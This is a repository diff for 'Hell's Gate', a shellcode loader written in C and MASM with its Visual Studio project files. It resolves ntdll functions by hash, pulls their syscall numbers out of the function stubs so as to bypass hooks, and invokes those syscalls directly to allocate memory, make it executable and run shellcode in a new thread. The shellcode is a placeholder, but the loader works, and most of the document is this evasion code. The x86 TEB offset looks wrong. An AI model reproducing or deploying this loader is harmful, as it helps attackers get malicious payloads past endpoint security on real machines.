Debug|x86 = Debug|x86
|
||||
Release|x64 = Release|x64
|
||||
Release|x86 = Release|x86
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.Build.0 = Debug|x64
|
||||
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.ActiveCfg = Debug|Win32
|
||||
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.Build.0 = Debug|Win32
|
||||
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.ActiveCfg = Release|x64
|
||||
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.Build.0 = Release|x64
|
||||
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.ActiveCfg = Release|Win32
|
||||
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.Build.0 = Release|Win32
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
GlobalSection(ExtensibilityGlobals) = postSolution
|
||||
SolutionGuid = {AAAFFDAB-0074-4A3D-BA5B-63F51AA7F8EB}
|
||||
EndGlobalSection
|
||||
EndGlobal
|
|
@ -0,0 +1,161 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<VCProjectVersion>16.0</VCProjectVersion>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<ProjectGuid>{dc6187cb-d5df-4973-84a2-f92aae90cda9}</ProjectGuid>
|
||||
<RootNamespace>HellsGate</RootNamespace>
|
||||
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<SpectreMitigation>false</SpectreMitigation>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<SpectreMitigation>false</SpectreMitigation>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<SpectreMitigation>false</SpectreMitigation>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
<SpectreMitigation>false</SpectreMitigation>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="Shared">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="main.c" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="structs.h" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<MASM Include="hellsgate.asm">
|
||||
<FileType>Document</FileType>
|
||||
</MASM>
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
|
||||
</ImportGroup>
|
||||
</Project>
|
|
@ -0,0 +1,32 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup>
|
||||
<Filter Include="Source Files">
|
||||
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
|
||||
<Extensions>cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Header Files">
|
||||
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
|
||||
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Resource Files">
|
||||
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
|
||||
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="main.c">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="structs.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<MASM Include="hellsgate.asm">
|
||||
<Filter>Source Files</Filter>
|
||||
</MASM>
|
||||
</ItemGroup>
|
||||
</Project>
|
|
@ -0,0 +1,23 @@
|
|||
; Hell's Gate
|
||||
; Dynamic system call invocation
|
||||
;
|
||||
; by smelly__vx (@RtlMateusz) and am0nsec (@am0nsec)
|
||||
|
||||
.data
|
||||
wSystemCall DWORD 000h
|
||||
|
||||
.code
|
||||
HellsGate PROC
|
||||
mov wSystemCall, 000h
|
||||
mov wSystemCall, ecx
|
||||
ret
|
||||
HellsGate ENDP
|
||||
|
||||
HellDescent PROC
|
||||
mov r10, rcx
|
||||
mov eax, wSystemCall
|
||||
|
||||
syscall
|
||||
ret
|
||||
HellDescent ENDP
|
||||
end
|
|
@ -0,0 +1,211 @@
|
|||
#pragma once
|
||||
#include <Windows.h>
|
||||
#include "structs.h"
|
||||
|
||||
/*--------------------------------------------------------------------
|
||||
VX Tables
|
||||
--------------------------------------------------------------------*/
|
||||
typedef struct _VX_TABLE_ENTRY {
|
||||
PVOID pAddress;
|
||||
DWORD64 dwHash;
|
||||
WORD wSystemCall;
|
||||
} VX_TABLE_ENTRY, * PVX_TABLE_ENTRY;
|
||||
|
||||
typedef struct _VX_TABLE {
|
||||
VX_TABLE_ENTRY NtAllocateVirtualMemory;
|
||||
VX_TABLE_ENTRY NtProtectVirtualMemory;
|
||||
VX_TABLE_ENTRY NtCreateThreadEx;
|
||||
VX_TABLE_ENTRY NtWaitForSingleObject;
|
||||
} VX_TABLE, * PVX_TABLE;
|
||||
|
||||
/*--------------------------------------------------------------------
|
||||
Function prototypes.
|
||||
--------------------------------------------------------------------*/
|
||||
PTEB RtlGetThreadEnvironmentBlock();
|
||||
BOOL GetImageExportDirectory(
|
||||
_In_ PVOID pModuleBase,
|
||||
_Out_ PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory
|
||||
);
|
||||
BOOL GetVxTableEntry(
|
||||
_In_ PVOID pModuleBase,
|
||||
_In_ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory,
|
||||
_In_ PVX_TABLE_ENTRY pVxTableEntry
|
||||
);
|
||||
BOOL Payload(
|
||||
_In_ PVX_TABLE pVxTable
|
||||
);
|
||||
PVOID VxMoveMemory(
|
||||
_Inout_ PVOID dest,
|
||||
_In_ const PVOID src,
|
||||
_In_ SIZE_T len
|
||||
);
|
||||
|
||||
/*--------------------------------------------------------------------
|
||||
External functions' prototype.
|
||||
--------------------------------------------------------------------*/
|
||||
extern VOID HellsGate(WORD wSystemCall);
|
||||
extern HellDescent();
|
||||
|
||||
INT wmain() {
|
||||
PTEB pCurrentTeb = RtlGetThreadEnvironmentBlock();
|
||||
PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;
|
||||
if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0xA)
|
||||
return 0x1;
|
||||
|
||||
// Get NTDLL module
|
||||
PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);
|
||||
|
||||
// Get the EAT of NTDLL
|
||||
PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
|
||||
if (!GetImageExportDirectory(pLdrDataEntry->DllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
|
||||
return 0x01;
|
||||
|
||||
VX_TABLE Table = { 0 };
|
||||
Table.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
|
||||
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtAllocateVirtualMemory))
|
||||
return 0x1;
|
||||
|
||||
Table.NtCreateThreadEx.dwHash = 0x64dc7db288c5015f;
|
||||
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtCreateThreadEx))
|
||||
return 0x1;
|
||||
|
||||
Table.NtProtectVirtualMemory.dwHash = 0x858bcb1046fb6a37;
|
||||
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtProtectVirtualMemory))
|
||||
return 0x1;
|
||||
|
||||
Table.NtWaitForSingleObject.dwHash = 0xc6a2fa174e551bcb;
|
||||
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtWaitForSingleObject))
|
||||
return 0x1;
|
||||
|
||||
Payload(&Table);
|
||||
return 0x00;
|
||||
}
|
||||
|
||||
PTEB RtlGetThreadEnvironmentBlock() {
|
||||
#if _WIN64
|
||||
return (PTEB)__readgsqword(0x30);
|
||||
#else
|
||||
return (PTEB)__readfsdword(0x16);
|
||||
#endif
|
||||
}
|
||||
|
||||
DWORD64 djb2(PBYTE str) {
|
||||
DWORD64 dwHash = 0x7734773477347734;
|
||||
INT c;
|
||||
|
||||
while (c = *str++)
|
||||
dwHash = ((dwHash << 0x5) + dwHash) + c;
|
||||
|
||||
return dwHash;
|
||||
}
|
||||
|
||||
BOOL GetImageExportDirectory(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory) {
|
||||
// Get DOS header
|
||||
PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)pModuleBase;
|
||||
if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
// Get NT headers
|
||||
PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pModuleBase + pImageDosHeader->e_lfanew);
|
||||
if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
// Get the EAT
|
||||
*ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pModuleBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry) {
|
||||
PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
|
||||
PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
|
||||
PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);
|
||||
|
||||
for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
|
||||
PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
|
||||
PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
|
||||
|
||||
if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
|
||||
pVxTableEntry->pAddress = pFunctionAddress;
|
||||
|
||||
// Quick and dirty fix in case the function has been hooked
|
||||
WORD cw = 0;
|
||||
while (TRUE) {
|
||||
// check if syscall, in this case we are too far
|
||||
if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
|
||||
return FALSE;
|
||||
|
||||
// check if ret, in this case we are also probaly too far
|
||||
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
|
||||
return FALSE;
|
||||
|
||||
// First opcodes should be :
|
||||
// MOV R10, RCX
|
||||
// MOV RCX, <syscall>
|
||||
if (*((PBYTE)pFunctionAddress + cw) == 0x4c
|
||||
&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
|
||||
&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
|
||||
&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
|
||||
&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
|
||||
&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
|
||||
BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
|
||||
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
|
||||
pVxTableEntry->wSystemCall = (high << 8) | low;
|
||||
break;
|
||||
}
|
||||
|
||||
cw++;
|
||||
};
|
||||
}
|
||||
}
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
BOOL Payload(PVX_TABLE pVxTable) {
|
||||
NTSTATUS status = 0x00000000;
|
||||
char shellcode[] = "\x90\x90\x90\x90\xcc\xcc\xcc\xcc\xc3";
|
||||
|
||||
// Allocate memory for the shellcode
|
||||
PVOID lpAddress = NULL;
|
||||
SIZE_T sDataSize = sizeof(shellcode);
|
||||
HellsGate(pVxTable->NtAllocateVirtualMemory.wSystemCall);
|
||||
status = HellDescent((HANDLE)-1, &lpAddress, 0, &sDataSize, MEM_COMMIT, PAGE_READWRITE);
|
||||
|
||||
// Write Memory
|
||||
VxMoveMemory(lpAddress, shellcode, sizeof(shellcode));
|
||||
|
||||
// Change page permissions
|
||||
ULONG ulOldProtect = 0;
|
||||
HellsGate(pVxTable->NtProtectVirtualMemory.wSystemCall);
|
||||
status = HellDescent((HANDLE)-1, &lpAddress, &sDataSize, PAGE_EXECUTE_READ, &ulOldProtect);
|
||||
|
||||
// Create thread
|
||||
HANDLE hHostThread = INVALID_HANDLE_VALUE;
|
||||
HellsGate(pVxTable->NtCreateThreadEx.wSystemCall);
|
||||
status = HellDescent(&hHostThread, 0x1FFFFF, NULL, (HANDLE)-1, (LPTHREAD_START_ROUTINE)lpAddress, NULL, FALSE, NULL, NULL, NULL, NULL);
|
||||
|
||||
// Wait for 1 seconds
|
||||
LARGE_INTEGER Timeout;
|
||||
Timeout.QuadPart = -10000000;
|
||||
HellsGate(pVxTable->NtWaitForSingleObject.wSystemCall);
|
||||
status = HellDescent(hHostThread, FALSE, &Timeout);
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
PVOID VxMoveMemory(PVOID dest, const PVOID src, SIZE_T len) {
|
||||
char* d = dest;
|
||||
const char* s = src;
|
||||
if (d < s)
|
||||
while (len--)
|
||||
*d++ = *s++;
|
||||
else {
|
||||
char* lasts = s + (len - 1);
|
||||
char* lastd = d + (len - 1);
|
||||
while (len--)
|
||||
*lastd-- = *lasts--;
|
||||
}
|
||||
return dest;
|
||||
}
|
|
@ -0,0 +1,337 @@
|
|||
#pragma once
|
||||
#include <Windows.h>
|
||||
|
||||
/*--------------------------------------------------------------------
|
||||
STRUCTURES
|
||||
--------------------------------------------------------------------*/
|
||||
typedef struct _LSA_UNICODE_STRING {
|
||||
USHORT Length;
|
||||
USHORT MaximumLength;
|
||||
PWSTR Buffer;
|
||||
} LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING, * PUNICODE_STR;
|
||||
|
||||
typedef struct _LDR_MODULE {
|
||||
LIST_ENTRY InLoadOrderModuleList;
|
||||
LIST_ENTRY InMemoryOrderModuleList;
|
||||
LIST_ENTRY InInitializationOrderModuleList;
|
||||
PVOID BaseAddress;
|
||||
PVOID EntryPoint;
|
||||
ULONG SizeOfImage;
|
||||
UNICODE_STRING FullDllName;
|
||||
UNICODE_STRING BaseDllName;
|
||||
ULONG Flags;
|
||||
SHORT LoadCount;
|
||||
SHORT TlsIndex;
|
||||
LIST_ENTRY HashTableEntry;
|
||||
ULONG TimeDateStamp;
|
||||
} LDR_MODULE, * PLDR_MODULE;
|
||||
|
||||
typedef struct _PEB_LDR_DATA {
|
||||
ULONG Length;
|
||||
ULONG Initialized;
|
||||
PVOID SsHandle;
|
||||
LIST_ENTRY InLoadOrderModuleList;
|
||||
LIST_ENTRY InMemoryOrderModuleList;
|
||||
LIST_ENTRY InInitializationOrderModuleList;
|
||||
} PEB_LDR_DATA, * PPEB_LDR_DATA;
|
||||
|
||||
typedef struct _PEB {
|
||||
BOOLEAN InheritedAddressSpace;
|
||||
BOOLEAN ReadImageFileExecOptions;
|
||||
BOOLEAN BeingDebugged;
|
||||
BOOLEAN Spare;
|
||||
HANDLE Mutant;
|
||||
PVOID ImageBase;
|
||||
PPEB_LDR_DATA LoaderData;
|
||||
PVOID ProcessParameters;
|
||||
PVOID SubSystemData;
|
||||
PVOID ProcessHeap;
|
||||
PVOID FastPebLock;
|
||||
PVOID FastPebLockRoutine;
|
||||
PVOID FastPebUnlockRoutine;
|
||||
ULONG EnvironmentUpdateCount;
|
||||
PVOID* KernelCallbackTable;
|
||||
PVOID EventLogSection;
|
||||
PVOID EventLog;
|
||||
PVOID FreeList;
|
||||
ULONG TlsExpansionCounter;
|
||||
PVOID TlsBitmap;
|
||||
ULONG TlsBitmapBits[0x2];
|
||||
PVOID ReadOnlySharedMemoryBase;
|
||||
PVOID ReadOnlySharedMemoryHeap;
|
||||
PVOID* ReadOnlyStaticServerData;
|
||||
PVOID AnsiCodePageData;
|
||||
PVOID OemCodePageData;
|
||||
PVOID UnicodeCaseTableData;
|
||||
ULONG NumberOfProcessors;
|
||||
ULONG NtGlobalFlag;
|
||||
BYTE Spare2[0x4];
|
||||
LARGE_INTEGER CriticalSectionTimeout;
|
||||
ULONG HeapSegmentReserve;
|
||||
ULONG HeapSegmentCommit;
|
||||
ULONG HeapDeCommitTotalFreeThreshold;
|
||||
ULONG HeapDeCommitFreeBlockThreshold;
|
||||
ULONG NumberOfHeaps;
|
||||
ULONG MaximumNumberOfHeaps;
|
||||
PVOID** ProcessHeaps;
|
||||
PVOID GdiSharedHandleTable;
|
||||
PVOID ProcessStarterHelper;
|
||||
PVOID GdiDCAttributeList;
|
||||
PVOID LoaderLock;
|
||||
ULONG OSMajorVersion;
|
||||
ULONG OSMinorVersion;
|
||||
ULONG OSBuildNumber;
|
||||
ULONG OSPlatformId;
|
||||
ULONG ImageSubSystem;
|
||||
ULONG ImageSubSystemMajorVersion;
|
||||
ULONG ImageSubSystemMinorVersion;
|
||||
ULONG GdiHandleBuffer[0x22];
|
||||
ULONG PostProcessInitRoutine;
|
||||
ULONG TlsExpansionBitmap;
|
||||
BYTE TlsExpansionBitmapBits[0x80];
|
||||
ULONG SessionId;
|
||||
} PEB, * PPEB;
|
||||
|
||||
typedef struct __CLIENT_ID {
|
||||
HANDLE UniqueProcess;
|
||||
HANDLE UniqueThread;
|
||||
} CLIENT_ID, * PCLIENT_ID;
|
||||
|
||||
typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
|
||||
ULONG Flags;
|
||||
PCHAR FrameName;
|
||||
} TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;
|
||||
|
||||
typedef struct _TEB_ACTIVE_FRAME {
|
||||
ULONG Flags;
|
||||
struct _TEB_ACTIVE_FRAME* Previous;
|
||||
PTEB_ACTIVE_FRAME_CONTEXT Context;
|
||||
} TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;
|
||||
|
||||
typedef struct _GDI_TEB_BATCH {
|
||||
ULONG Offset;
|
||||
ULONG HDC;
|
||||
ULONG Buffer[310];
|
||||
} GDI_TEB_BATCH, * PGDI_TEB_BATCH;
|
||||
|
||||
typedef PVOID PACTIVATION_CONTEXT;
|
||||
|
||||
typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
|
||||
struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
|
||||
PACTIVATION_CONTEXT ActivationContext;
|
||||
ULONG Flags;
|
||||
} RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
|
||||
|
||||
typedef struct _ACTIVATION_CONTEXT_STACK {
|
||||
PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
|
||||
LIST_ENTRY FrameListCache;
|
||||
ULONG Flags;
|
||||
ULONG NextCookieSequenceNumber;
|
||||
ULONG StackId;
|
||||
} ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;
|
||||
|
||||
typedef struct _TEB {
|
||||
NT_TIB NtTib;
|
||||
PVOID EnvironmentPointer;
|
||||
CLIENT_ID ClientId;
|
||||
PVOID ActiveRpcHandle;
|
||||
PVOID ThreadLocalStoragePointer;
|
||||
PPEB ProcessEnvironmentBlock;
|
||||
ULONG LastErrorValue;
|
||||
ULONG CountOfOwnedCriticalSections;
|
||||
PVOID CsrClientThread;
|
||||
PVOID Win32ThreadInfo;
|
||||
ULONG User32Reserved[26];
|
||||
ULONG UserReserved[5];
|
||||
PVOID WOW32Reserved;
|
||||
LCID CurrentLocale;
|
||||
ULONG FpSoftwareStatusRegister;
|
||||
PVOID SystemReserved1[54];
|
||||
LONG ExceptionCode;
|
||||
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||
PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer;
|
||||
UCHAR SpareBytes1[0x30 - 3 * sizeof(PVOID)];
|
||||
ULONG TxFsContext;
|
||||
#elif (NTDDI_VERSION >= NTDDI_WS03)
|
||||
PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
|
||||
UCHAR SpareBytes1[0x34 - 3 * sizeof(PVOID)];
|
||||
#else
|
||||
ACTIVATION_CONTEXT_STACK ActivationContextStack;
|
||||
UCHAR SpareBytes1[24];
|
||||
#endif
|
||||
GDI_TEB_BATCH GdiTebBatch;
|
||||
CLIENT_ID RealClientId;
|
||||
PVOID GdiCachedProcessHandle;
|
||||
ULONG GdiClientPID;
|
||||
ULONG GdiClientTID;
|
||||
PVOID GdiThreadLocalInfo;
|
||||
PSIZE_T Win32ClientInfo[62];
|
||||
PVOID glDispatchTable[233];
|
||||
PSIZE_T glReserved1[29];
|
||||
PVOID glReserved2;
|
||||
PVOID glSectionInfo;
|
||||
PVOID glSection;
|
||||
PVOID glTable;
|
||||
PVOID glCurrentRC;
|
||||
PVOID glContext;
